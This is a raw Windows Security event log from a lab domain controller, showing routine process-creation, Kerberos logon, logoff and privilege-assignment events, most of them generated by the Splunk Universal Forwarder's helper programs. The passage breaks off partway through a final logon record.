Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263674
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1518
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:19:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263676
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73FAB4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263679
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x743438
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263678
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x743438
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59953
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263677
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x743438
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:20:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263681
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1160
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263680
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1848
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263682
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263683
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf54
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263684
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263686
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263685
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:20:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263689
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x746E55
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:20:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263688
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x746E55
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59967
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:20:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263687
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x746E55
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:21:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263691
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1610
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263690
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263692
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1590
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263693
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263694
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1994
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263696
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x188c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263695
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x137c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:21:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263698
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x749DA9
Linked Logon ID: 0x0
